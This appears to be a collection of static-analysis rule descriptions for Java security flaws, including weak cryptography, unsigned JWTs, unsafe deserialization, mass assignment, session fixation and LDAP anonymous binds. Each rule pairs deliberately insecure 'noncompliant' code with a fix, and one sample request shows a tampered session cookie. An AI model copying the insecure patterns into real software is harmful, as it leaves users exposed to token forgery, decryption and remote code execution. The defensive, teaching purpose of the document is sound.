JavaBeans can have their properties or nested properties set by population functions. An attacker can leverage this feature to push into the JavaBean malicious data that can compromise the software integrity. A typical attack will try to manipulate the ClassLoader and finally execute malicious code.

This rule raises an issue when:

  • BeanUtils.populate(…​) or BeanUtilsBean.populate(…​) from Apache Commons BeanUtils are called
  • BeanUtils.setProperty(…​) or BeanUtilsBean.setProperty(…​) from Apache Commons BeanUtils are called
  • org.springframework.beans.BeanWrapper.setPropertyValue(…​) or org.springframework.beans.BeanWrapper.setPropertyValues(…​) from Spring is called

Ask Yourself Whether

  • the new property values might have been tampered with or provided by an untrusted source.
  • sensitive properties can be modified, for example: class.classLoader

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Sanitize all values used as JavaBean properties.

Don’t set any sensitive properties. Keep full control over which properties are set. If the property names are provided by an unstrusted source, filter them with a whitelist.

Sensitive Code Example

Company bean = new Company();
HashMap map = new HashMap();
Enumeration names = request.getParameterNames();
while (names.hasMoreElements()) {
    String name = (String) names.nextElement();
    map.put(name, request.getParameterValues(name));
}
BeanUtils.populate(bean, map); // Sensitive: "map" is populated with data coming from user input, here "request.getParameterNames()"

See

java:S4684

Why is this an issue?

On one side, Spring MVC automatically bind request parameters to beans declared as arguments of methods annotated with @RequestMapping. Because of this automatic binding feature, it’s possible to feed some unexpected fields on the arguments of the @RequestMapping annotated methods.

On the other end, persistent objects (@Entity or @Document) are linked to the underlying database and updated automatically by a persistence framework, such as Hibernate, JPA or Spring Data MongoDB.

These two facts combined together can lead to malicious attack: if a persistent object is used as an argument of a method annotated with @RequestMapping, it’s possible from a specially crafted user input, to change the content of unexpected fields into the database.

For this reason, using @Entity or @Document objects as arguments of methods annotated with @RequestMapping should be avoided.

In addition to @RequestMapping, this rule also considers the annotations introduced in Spring Framework 4.3: @GetMapping, @PostMapping, @PutMapping, @DeleteMapping, @PatchMapping.

Noncompliant code example

import javax.persistence.Entity;

@Entity
public class Wish {
  Long productId;
  Long quantity;
  Client client;
}

@Entity
public class Client {
  String clientId;
  String name;
  String password;
}

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;

@Controller
public class WishListController {

  @PostMapping(path = "/saveForLater")
  public String saveForLater(Wish wish) {
    session.save(wish);
  }

  @RequestMapping(path = "/saveForLater", method = RequestMethod.POST)
  public String saveForLater(Wish wish) {
    session.save(wish);
  }
}

Compliant solution

public class WishDTO {
  Long productId;
  Long quantity;
  Long clientId;
}

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;

@Controller
public class PurchaseOrderController {

  @PostMapping(path = "/saveForLater")
  public String saveForLater(WishDTO wish) {
    Wish persistentWish = new Wish();
    // do the mapping between "wish" and "persistentWish"
    [...]
    session.save(persistentWish);
  }

  @RequestMapping(path = "/saveForLater", method = RequestMethod.POST)
  public String saveForLater(WishDTO wish) {
    Wish persistentWish = new Wish();
    // do the mapping between "wish" and "persistentWish"
    [...]
    session.save(persistentWish);
  }
}

Exceptions

No issue is reported when the parameter is annotated with @PathVariable from Spring Framework, since the lookup will be done via id, the object cannot be forged on client side.

Resources

java:S5659

This vulnerability allows forging of JSON Web Tokens to impersonate other users.

Why is this an issue?

JSON Web Tokens (JWTs), a popular method of securely transmitting information between parties as a JSON object, can become a significant security risk when they are not properly signed with a robust cipher algorithm, left unsigned altogether, or if the signature is not verified. This vulnerability class allows malicious actors to craft fraudulent tokens, effectively impersonating user identities. In essence, the integrity of a JWT hinges on the strength and presence of its signature.

What is the potential impact?

When a JSON Web Token is not appropriately signed with a strong cipher algorithm or if the signature is not verified, it becomes a significant threat to data security and the privacy of user identities.

Impersonation of users

JWTs are commonly used to represent user authorization claims. They contain information about the user’s identity, user roles, and access rights. When these tokens are not securely signed, it allows an attacker to forge them. In essence, a weak or missing signature gives an attacker the power to craft a token that could impersonate any user. For instance, they could create a token for an administrator account, gaining access to high-level permissions and sensitive data.

Unauthorized data access

When a JWT is not securely signed, it can be tampered with by an attacker, and the integrity of the data it carries cannot be trusted. An attacker can manipulate the content of the token and grant themselves permissions they should not have, leading to unauthorized data access.

How to fix it in Java JWT

Code examples

The following code contains examples of JWT encoding and decoding without a strong cipher algorithm.

Noncompliant code example

import io.jsonwebtoken.Jwts;

public void encode() {
    Jwts.builder()
        .setSubject(USER_LOGIN)
        .compact(); // Noncompliant
}
import io.jsonwebtoken.Jwts;

public void decode() {
    Jwts.parser()
        .setSigningKey(SECRET_KEY)
        .parse(token)
        .getBody(); // Noncompliant
}

Compliant solution

import io.jsonwebtoken.Jwts;

public void encode() {
    Jwts.builder()
        .setSubject(USER_LOGIN)
        .signWith(SignatureAlgorithm.HS256, SECRET_KEY)
        .compact();
}

When using Jwts.parser(), make sure to call parseClaimsJws instead of parse as it throws exceptions for invalid or missing signatures.

import io.jsonwebtoken.Jwts;

public void decode() {
    Jwts.parser()
        .setSigningKey(SECRET_KEY)
        .parseClaimsJws(token)
        .getBody();
}

How does this work?

Always sign your tokens

The foremost measure to enhance JWT security is to ensure that every JWT you issue is signed. Unsigned tokens are like open books that anyone can tamper with. Signing your JWTs ensures that any alterations to the tokens after they have been issued can be detected. Most JWT libraries support a signing function, and using it is usually as simple as providing a secret key when the token is created.

Choose a strong cipher algorithm

It is not enough to merely sign your tokens. You need to sign them with a strong cipher algorithm. Algorithms like HS256 (HMAC using SHA-256) are considered secure for most purposes. But for an additional layer of security, you could use an algorithm like RS256 (RSA Signature with SHA-256), which uses a private key for signing and a public key for verification. This way, even if someone gains access to the public key, they will not be able to forge tokens.

Verify the signature of your tokens

Resolving a vulnerability concerning the validation of JWT token signatures is mainly about incorporating a critical step into your process: validating the signature every time a token is decoded. Just having a signed token using a secure algorithm is not enough. If you are not validating signatures, they are not serving their purpose.

Every time your application receives a JWT, it needs to decode the token to extract the information contained within. It is during this decoding process that the signature of the JWT should also be checked.

To resolve the issue follow these instructions:

  1. Use framework-specific functions for signature verification: Most programming frameworks that support JWTs provide specific functions to not only decode a token but also validate its signature simultaneously. Make sure to use these functions when handling incoming tokens.
  2. Handle invalid signatures appropriately: If a JWT’s signature does not validate correctly, it means the token is not trustworthy, indicating potential tampering. The action to take on encountering an invalid token should be denying the request carrying it and logging the event for further investigation.
  3. Incorporate signature validation in your tests: When you are writing tests for your application, include tests that check the signature validation functionality. This can help you catch any instances where signature verification might be unintentionally skipped or bypassed.

By following these practices, you can ensure the security of your application’s JWT handling process, making it resistant to attacks that rely on tampering with tokens. Validation of the signature needs to be an integral and non-negotiable part of your token handling process.

Going the extra mile

Securely store your secret keys

Ensure that your secret keys are stored securely. They should not be hard-coded into your application code or checked into your version control system. Instead, consider using environment variables, secure key management systems, or vault services.

Rotate your secret keys

Even with the strongest cipher algorithms, there is a risk that your secret keys may be compromised. Therefore, it is a good practice to periodically rotate your secret keys. By doing so, you limit the amount of time that an attacker can misuse a stolen key. When you rotate keys, be sure to allow a grace period where tokens signed with the old key are still accepted to prevent service disruptions.

Resources

Standards

java:S5547

This vulnerability makes it possible that the cleartext of the encrypted message might be recoverable without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Java Cryptographic Extension

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

import javax.crypto.Cipher;
import java.security.NoSuchAlgorithmException;
import javax.crypto.NoSuchPaddingException;

public static void main(String[] args) {
    try {
        Cipher des = Cipher.getInstance("DES"); // Noncompliant
    } catch(NoSuchAlgorithmException|NoSuchPaddingException e) {
        // ...
    }
}

Compliant solution

import javax.crypto.Cipher;
import java.security.NoSuchAlgorithmException;
import javax.crypto.NoSuchPaddingException;

public static void main(String[] args) {
    try {
        Cipher aes = Cipher.getInstance("AES/GCM/NoPadding");
    } catch(NoSuchAlgorithmException|NoSuchPaddingException e) {
        // ...
    }
}

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.

Resources

Standards

java:S5542

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

For AES, the weakest modes are CBC (Cipher Block Chaining) and ECB

(Electronic Codebook), as they are either vulnerable to padding oracles or do not provide authentication mechanisms.

And for RSA, the weakest algorithms are either using it without padding or using the PKCS1v1.5 padding scheme.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate possible impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Java Cryptographic Extension

Code examples

Noncompliant code example

Example with a symmetric cipher, AES:

import javax.crypto.Cipher;
import java.security.NoSuchAlgorithmException;
import javax.crypto.NoSuchPaddingException;

public static void main(String[] args) {
    try {
        Cipher.getInstance("AES/CBC/PKCS5Padding"); // Noncompliant
    } catch(NoSuchAlgorithmException|NoSuchPaddingException e) {
        // ...
    }
}

Example with an asymmetric cipher, RSA:

import javax.crypto.Cipher;
import java.security.NoSuchAlgorithmException;
import javax.crypto.NoSuchPaddingException;

public static void main(String[] args) {
    try {
        Cipher.getInstance("RSA/None/NoPadding"); // Noncompliant
    } catch(NoSuchAlgorithmException|NoSuchPaddingException e) {
        // ...
    }
}

Compliant solution

For the AES symmetric cipher, use the GCM mode:

import javax.crypto.Cipher;
import java.security.NoSuchAlgorithmException;
import javax.crypto.NoSuchPaddingException;

public static void main(String[] args) {
    try {
        Cipher.getInstance("AES/GCM/NoPadding");
    } catch(NoSuchAlgorithmException|NoSuchPaddingException e) {
        // ...
    }
}

For the RSA asymmetric cipher, use the Optimal Asymmetric Encryption Padding (OAEP):

import javax.crypto.Cipher;
import java.security.NoSuchAlgorithmException;
import javax.crypto.NoSuchPaddingException;

public static void main(String[] args) {
    try {
        Cipher.getInstance("RSA/ECB/OAEPWITHSHA-256ANDMGF1PADDING");
    } catch(NoSuchAlgorithmException|NoSuchPaddingException e) {
        // ...
    }
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

Appropriate choices are currently the following.

For AES: Use Galois/Counter mode (GCM)

GCM mode combines encryption with authentication and integrity checks using a cryptographic hash function and provides both confidentiality and authenticity of data.

Other similar modes are:

  • CCM: Counter with CBC-MAC
  • CWC: Cipher Block Chaining with Message Authentication Code
  • EAX: Encrypt-and-Authenticate
  • IAPM: Integer Authenticated Parallelizable Mode
  • OCB: Offset Codebook Mode

It is also possible to use AES-CBC with HMAC for integrity checks. However, it

is considered more straightforward to use AES-GCM directly instead.

For RSA: use the OAEP scheme

The Optimal Asymmetric Encryption Padding scheme (OAEP) adds randomness and a secure hash function that strengthens the regular inner workings of RSA.

Resources

Articles & blog posts

Standards

java:S5301

Why is this an issue?

ActiveMQ can send/receive JMS Object messages (named ObjectMessage in ActiveMQ context) to comply with JMS specification. Internally, ActiveMQ relies on Java serialization mechanism for marshaling/unmarshalling of the message payload. Deserialization based on data supplied by the user could lead to remote code execution attacks, where the structure of the serialized data is changed to modify the behavior of the object being unserialized.

To limit the risk to be victim of such attack, ActiveMQ 5.12.2+ enforces developers to explicitly whitelist packages that can be exchanged using ObjectMessages.

Noncompliant code example

ActiveMQConnectionFactory factory = new ActiveMQConnectionFactory("tcp://localhost:61616");
factory.setTrustAllPackages(true); // Noncompliant

ActiveMQConnectionFactory factory = new ActiveMQConnectionFactory("tcp://localhost:61616");
// no call to factory.setTrustedPackages(...);

Compliant solution

ActiveMQConnectionFactory factory = new ActiveMQConnectionFactory("tcp://localhost:61616");
factory.setTrustedPackages(Arrays.asList("org.mypackage1", "org.mypackage2"));

Resources

java:S5876

Why is this an issue?

Session fixation attacks occur when an attacker can force a legitimate user to use a session ID that he knows. To avoid fixation attacks, it’s a good practice to generate a new session each time a user authenticates and delete/invalidate the existing session (the one possibly known by the attacker).

Noncompliant code example

In a Spring Security’s context, session fixation protection is enabled by default but can be disabled with sessionFixation().none() method:

@Override
protected void configure(HttpSecurity http) throws Exception {
   http.sessionManagement()
     .sessionFixation().none(); // Noncompliant: the existing session will continue
}

Compliant solution

In a Spring Security’s context, session fixation protection can be enabled as follows:

@Override
protected void configure(HttpSecurity http) throws Exception {
  http.sessionManagement()
     .sessionFixation().newSession(); // Compliant: a new session is created without any of the attributes from the old session being copied over

  // or

  http.sessionManagement()
     .sessionFixation().migrateSession(); // Compliant: a new session is created, the old one is invalidated and the attributes from the old session are copied over.
}

Resources

java:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Java Cryptographic Extension

Code examples

Noncompliant code example

import javax.net.ssl.SSLContext;
import java.security.NoSuchAlgorithmException;

public static void main(String[] args) {
    try {
        SSLContext.getInstance("TLSv1.1"); // Noncompliant
    } catch (NoSuchAlgorithmException e) {
        // ...
    }
}

Compliant solution

import javax.net.ssl.SSLContext;
import java.security.NoSuchAlgorithmException;

public static void main(String[] args) {
    try {
        SSLContext.getInstance("TLSv1.2");
    } catch (NoSuchAlgorithmException e) {
        // ...
    }
}

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS V1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback depends on whether the framework used is outdated: its TLS v1.2 settings may enable older and insecure cipher suites that are deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.

Resources

Articles & blog posts

Standards

java:S4544

Using unsafe Jackson deserialization configuration is security-sensitive. It has led in the past to the following vulnerabilities:

When Jackson is configured to allow Polymorphic Type Handling (aka PTH), formerly known as Polymorphic Deserialization, "deserialization gadgets" may allow an attacker to perform remote code execution.

This rule raises an issue when:

  • enableDefaultTyping() is called on an instance of com.fasterxml.jackson.databind.ObjectMapper or org.codehaus.jackson.map.ObjectMapper.
  • or when the annotation @JsonTypeInfo is set at class, interface or field levels and configured with use = JsonTypeInfo.Id.CLASS or use = Id.MINIMAL_CLASS.

Ask Yourself Whether

  • You configured the Jackson deserializer as mentioned above.
  • The serialized data might come from an untrusted source.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use the latest patch versions of jackson-databind blocking the already discovered "deserialization gadgets".
  • Avoid using the default typing configuration: ObjectMapper.enableDefaultTyping().
  • If possible, use @JsonTypeInfo(use = Id.NAME) instead of @JsonTypeInfo(use = Id.CLASS) or @JsonTypeInfo(use = Id. MINIMAL_CLASS) and so rely on @JsonTypeName and @JsonSubTypes.

Sensitive Code Example

ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping(); // Sensitive
@JsonTypeInfo(use = Id.CLASS) // Sensitive
abstract class PhoneNumber {
}

See

java:S2245

Using pseudorandom number generators (PRNGs) is security-sensitive. For example, it has led in the past to the following vulnerabilities:

When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.

As the java.util.Random class relies on a pseudorandom number generator, this class and relating java.lang.Math.random() method should not be used for security-critical applications or for protecting sensitive data. In such context, the java.security.SecureRandom class which relies on a cryptographically strong random number generator (RNG) should be used in place.

Ask Yourself Whether

  • the code using the generated value requires it to be unpredictable. It is the case for all encryption mechanisms or when a secret value, such as a password, is hashed.
  • the function you use generates a value which can be predicted (pseudo-random).
  • the generated value is used multiple times.
  • an attacker can access the generated value.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a cryptographically strong random number generator (RNG) like "java.security.SecureRandom" in place of this PRNG.
  • Use the generated random values only once.
  • You should not expose the generated random value. If you have to store it, make sure that the database or file is secure.

Sensitive Code Example

Random random = new Random(); // Sensitive use of Random
byte bytes[] = new byte[20];
random.nextBytes(bytes); // Check if bytes is used for hashing, encryption, etc...

Compliant Solution

SecureRandom random = new SecureRandom(); // Compliant for security-sensitive use cases
byte bytes[] = new byte[20];
random.nextBytes(bytes);

See

java:S4426

This vulnerability exposes encrypted data to attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In today’s cryptography, the length of the key directly affects the security level of cryptographic algorithms.

Note that depending on the algorithm, the term key refers to a different mathematical property. For example:

  • For RSA, the key is the product of two large prime numbers, also called the modulus.
  • For AES and Elliptic Curve Cryptography (ECC), the key is only a sequence of randomly generated bytes.
    • In some cases, AES keys are derived from a master key or a passphrase using a Key Derivation Function (KDF) like PBKDF2 (Password-Based Key Derivation Function 2)

If an application uses a key that is considered short and insecure, the encrypted data is exposed to attacks aimed at getting at the plaintext.

In general, it is best practice to expect a breach: that a user or organization with malicious intent will perform cryptographic attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Java Cryptographic Extension

Code examples

The following code examples either explicitly or implicitly generate keys. Note that there are differences in the size of the keys depending on the algorithm.

Due to the mathematical properties of the algorithms, the security requirements for the key size vary depending on the algorithm.
For example, a 256-bit ECC key provides about the same level of security as a 3072-bit RSA key and a 128-bit symmetric key.

Noncompliant code example

Here is an example of a private key generation with RSA:

import java.security.KeyPairGenerator;
import java.security.NoSuchAlgorithmException;

public static void main(String[] args) {
    try {
        KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("RSA");
        keyPairGenerator.initialize(1024); // Noncompliant

    } catch (NoSuchAlgorithmException e) {
        // ...
    }
}

Here is an example of a private key generation with AES:

import java.security.KeyGenerator;
import java.security.NoSuchAlgorithmException;

public static void main(String[] args) {
    try {
        KeyGenerator keyGenerator = KeyGenerator.getInstance("AES");
        keyGenerator.initialize(64); // Noncompliant

    } catch (NoSuchAlgorithmException e) {
        // ...
    }
}

Here is an example of an Elliptic Curve (EC) initialization. It implicitly generates a private key whose size is indicated in the algorithm name:

import java.security.KeyPairGenerator;
import java.security.NoSuchAlgorithmException;
import java.security.InvalidAlgorithmParameterException;
import java.security.spec.ECGenParameterSpec;

public static void main(String[] args) {
    try {
        KeyPairGenerator keyPairGenerator    = KeyPairGenerator.getInstance("EC");
        ECGenParameterSpec ellipticCurveName = new ECGenParameterSpec("secp112r1"); // Noncompliant
        keyPairGenerator.initialize(ellipticCurveName);

    } catch (NoSuchAlgorithmException | InvalidAlgorithmParameterException e) {
        // ...
    }
}

Compliant solution

import java.security.KeyPairGenerator;
import java.security.NoSuchAlgorithmException;

public static void main(String[] args) {
    try {
        KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("RSA");
        keyPairGenerator.initialize(2048);

    } catch (NoSuchAlgorithmException e) {
        // ...
    }
}
import java.security.KeyPairGenerator;
import java.security.NoSuchAlgorithmException;

public static void main(String[] args) {
    try {
        KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("AES");
        keyPairGenerator.initialize(128);

    } catch (NoSuchAlgorithmException e) {
        // ...
    }
}
import java.security.KeyPairGenerator;
import java.security.NoSuchAlgorithmException;
import java.security.InvalidAlgorithmParameterException;
import java.security.spec.ECGenParameterSpec;

public static void main(String[] args) {
    try {
        KeyPairGenerator keyPairGenerator    = KeyPairGenerator.getInstance("EC");
        ECGenParameterSpec ellipticCurveName = new ECGenParameterSpec("secp256r1");
        keyPairGenerator.initialize(ellipticCurveName);

    } catch (NoSuchAlgorithmException | InvalidAlgorithmParameterException e) {
        // ...
    }
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The appropriate choices are the following.

RSA (Rivest-Shamir-Adleman) and DSA (Digital Signature Algorithm)

The security of these algorithms depends on the difficulty of attacks attempting to solve their underlying mathematical problem.

In general, a minimum key size of 2048 bits is recommended for both.

AES (Advanced Encryption Standard)

AES supports three key sizes: 128 bits, 192 bits and 256 bits. The security of the AES algorithm is based on the computational complexity of trying all possible keys.
A larger key size increases the number of possible keys and makes exhaustive search attacks computationally infeasible. Therefore, a 256-bit key provides a higher level of security than a 128-bit or 192-bit key.

Currently, a minimum key size of 128 bits is recommended for AES.

Elliptic Curve Cryptography (ECC)

Elliptic curve cryptography is also used in various algorithms, such as ECDSA, ECDH, or ECMQV. The length of keys generated with elliptic curve algorithms are mentioned directly in their names. For example, secp256k1 generates a 256-bits long private key.

Currently, a minimum key size of 224 bits is recommended for EC algorithms.

Going the extra mile

Pre-Quantum Cryptography

Encrypted data and communications recorded today could be decrypted in the future by an attack from a quantum computer.
It is important to keep in mind that NIST-approved digital signature schemes, key agreement, and key transport may need to be replaced with secure quantum-resistant (or "post-quantum") counterpart.

Thus, if data is to remain secure beyond 2030, proactive measures should be taken now to ensure its safety.

Learn more here.

Resources

Articles & blog posts

Standards

java:S3330

When a cookie is configured with the HttpOnly attribute set to true, the browser guaranties that no client-side script will be able to read it. In most cases, when a cookie is created, the default value of HttpOnly is false and it’s up to the developer to decide whether or not the content of the cookie can be read by the client-side script. As a majority of Cross-Site Scripting (XSS) attacks target the theft of session-cookies, the HttpOnly attribute can help to reduce their impact as it won’t be possible to exploit the XSS vulnerability to steal session-cookies.

Ask Yourself Whether

  • the cookie is sensitive, used to authenticate the user, for instance a session-cookie
  • the HttpOnly attribute offer an additional protection (not the case for an XSRF-TOKEN cookie / CSRF token for example)

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • By default the HttpOnly flag should be set to true for most of the cookies and it’s mandatory for session / sensitive-security cookies.

Sensitive Code Example

If you create a security-sensitive cookie in your JAVA code:

Cookie c = new Cookie(COOKIENAME, sensitivedata);
c.setHttpOnly(false);  // Sensitive: this sensitive cookie is created with the httponly flag set to false and so it can be stolen easily in case of XSS vulnerability

By default the HttpOnly flag is set to false:

Cookie c = new Cookie(COOKIENAME, sensitivedata);  // Sensitive: this sensitive cookie is created with the httponly flag not defined (by default set to false) and so it can be stolen easily in case of XSS vulnerability

Compliant Solution

Cookie c = new Cookie(COOKIENAME, sensitivedata);
c.setHttpOnly(true); // Compliant: this sensitive cookie is protected against theft (HttpOnly=true)

See

java:S4434

JNDI supports the deserialization of objects from LDAP directories, which can lead to remote code execution.

This rule raises an issue when an LDAP search query is executed with SearchControls configured to allow deserialization.

Ask Yourself Whether

  • The application connects to an untrusted LDAP directory.
  • User-controlled objects can be stored in the LDAP directory.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to disable deserialization of LDAP objects.

Sensitive Code Example

DirContext ctx = new InitialDirContext();
// ...
ctx.search(query, filter,
        new SearchControls(scope, countLimit, timeLimit, attributes,
            true, // Noncompliant; allows deserialization
            deref));

Compliant Solution

DirContext ctx = new InitialDirContext();
// ...
ctx.search(query, filter,
        new SearchControls(scope, countLimit, timeLimit, attributes,
            false, // Compliant
            deref));

See

java:S2257

The use of a non-standard algorithm is dangerous because a determined attacker may be able to break the algorithm and compromise whatever data has been protected. Standard algorithms like SHA-256, SHA-384, SHA-512, …​ should be used instead.

This rule tracks creation of java.security.MessageDigest subclasses.

Recommended Secure Coding Practices

  • Use a standard algorithm instead of creating a custom one.

Sensitive Code Example

public class MyCryptographicAlgorithm extends MessageDigest {
  ...
}

Compliant Solution

MessageDigest digest = MessageDigest.getInstance("SHA-256");

See

java:S2254

Why is this an issue?

According to the Oracle Java API, the HttpServletRequest.getRequestedSessionId() method:

Returns the session ID specified by the client. This may not be the same as the ID of the current valid session for this request. If the client did not specify a session ID, this method returns null.

The session ID it returns is either transmitted in a cookie or a URL parameter so by definition, nothing prevents the end-user from manually updating the value of this session ID in the HTTP request.

Here is an example of an updated HTTP header:

GET /pageSomeWhere HTTP/1.1
Host: webSite.com
User-Agent: Mozilla/5.0
Cookie: JSESSIONID=Hacked_Session_Value'''">

Due to the ability of the end-user to manually change the value, the session ID in the request should only be used by a servlet container (e.g. Tomcat or Jetty) to see if the value matches the ID of an existing session. If it does not, the user should be considered unauthenticated. Moreover, this session ID should never be logged as is but logged using a one-way hash to prevent hijacking of active sessions.

Noncompliant code example

if (isActiveSession(request.getRequestedSessionId())) {
  // ...
}

Resources

java:S4433

Lightweight Directory Access Protocol (LDAP) servers provide two main authentication methods: the SASL and Simple ones. The Simple Authentication method also breaks down into three different mechanisms:

  • Anonymous Authentication
  • Unauthenticated Authentication
  • Name/Password Authentication

A server that accepts either the Anonymous or Unauthenticated mechanisms will accept connections from clients not providing credentials.

Why is this an issue?

When configured to accept the Anonymous or Unauthenticated authentication mechanism, an LDAP server will accept connections from clients that do not provide a password or other authentication credentials. Such users will be able to read or modify part or all of the data contained in the hosted directory.

What is the potential impact?

An attacker exploiting unauthenticated access to an LDAP server can access the data that is stored in the corresponding directory. The impact varies depending on the permission obtained on the directory and the type of data it stores.

Authentication bypass

If attackers get write access to the directory, they will be able to alter most of the data it stores. This might include sensitive technical data such as user passwords or asset configurations. Such an attack can typically lead to an authentication bypass on applications and systems that use the affected directory as an identity provider.

In such a case, all users configured in the directory might see their identity and privileges taken over.
